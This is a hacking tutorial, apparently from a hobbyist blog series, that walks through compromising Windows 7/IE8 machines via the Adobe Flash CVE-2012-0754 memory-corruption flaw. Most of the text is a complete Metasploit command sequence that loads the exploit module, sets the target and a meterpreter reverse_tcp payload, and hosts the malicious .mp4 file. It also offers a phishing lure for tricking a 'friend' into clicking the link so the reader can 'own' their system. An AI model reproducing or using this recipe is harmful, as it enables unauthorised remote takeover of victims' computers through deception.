Welcome back, my greenhorn hackers!
In my continuing effort to demonstrate to you how to hack the ubiquitous Windows 7, we will going after that notoriously vulnerable Adobe Flash that is on nearly every client Windows system (you are not likely to find it on servers).
Flash and the other Adobe products have had a reputation for shoddy and insecure design for quite awhile now. The problem is so bad, that Apple will not allow Flash on its iOS operating system, angering many users, but keeping iOS more secure and energy efficient (when Flash crashes, it sucks up energy from the battery—and it crashes often, as we all know too well).
When we go to www.securityfocus.com and search the database for Adobe and then Flash Player, we get 8 pages of vulnerabilities with 20 vulnerabilities per page. Its obvious from this listing that Flash is riven with security problems. We could could spend weeks going through all the Adobe Flash Player vulnerabilities , but I'll leave that for you to do.
If you are looking to attack a client machine on a network, you would be well-served to spend your time focused on Adobe Flash. There are so many vulnerabilities and new ones arrive daily!
Let's take a look at one vulnerability known as CVE-2012-0754, a remote memory corruption. It was found in the wild back in February 2012 and involves using a corrupted .mp4 file to create a buffer overflow in Flash that enables the attacker to execute their own code. Note that it works for Adobe Flash Player through 11.1.
When we click on the "exploit" tab at the top of the page, it takes us to a link to the exploit. We can then download or copy and paste that exploit for use.
Let's open Metasploit and find the exploits built to take advantage of the Adobe Flash Player vulnerabilities. Search for "flash" using the following command.
- msf > search flash
When I do so, I find numerous flash exploits, but I have highlighted the one we are using here and it corresponds to CVE-2012-0754. Now let's use it.
- msf > use exploit/windows/browser/adobe_flash_mp4_cprt
When we do that, it will load the exploit into the console. Now let's get more info on it.
- msf > info
Metasploit returns for us some basic info on the exploit. I have highlighted the description in the screenshot above. In this info, we can also see that this exploit has 'targets". To get the most reliable results, you want to set the target.
In our case here, we are going after Windows 7 with IE8 (remember, IE8 came as default on Windows 7 and is still the most widely used browser with 21.2% of the market), so we set the target to 6.
- msf > set target 6
Next we need to set our options. We can see the options by typing:
- msf > show options
We need to set the SVRHOST and the payload at a minimum. We could also set the SVRPORT, the URIPATH, and the SSL settings, but we will leave these at their defaults here.
- msf > set SVRHOST 192.168.1.104
- msf > set payload windows/meterpreter/reverse_tcp
Once we set the payload, we once again need to check options as payloads have their own set of options. When we do so, we see that we need to set the LHOST (the IP of our local host) for the meterpreter.
- msf > set LHOST 192.168.1.104
With all the parameters we need set, all we need to do type:
- msf> exploit
This will now generate a corrupted .mp4 file and will host it on the Metasploit web server. Now we need to be creative and send that link to the victim and hope they click on it. For instance, you could send it to a "friend" saying "Hey, check out this great new hack I found on Null Byte!"
When they click on it, Metasploit will send the .mp4 file to their browser creating a buffer overflow as seen below.
With a bit of luck (this exploit doesn't work 100% of the time, more like 50%), you will be rewarded with the meterpreter prompt and you will own his or her system!
Hacking into modern operating systems is becoming more and more difficult as Microsoft and other software vendors become more security focused. The vigilant hacker can ALWAYS find a way in, if they are persistent and creative.
Sources such as SecurityFocus and other vulnerability databases (even Microsoft's own) are constantly logging vulnerabilities and the effective hacker simply needs to stay one step ahead of the software vendors.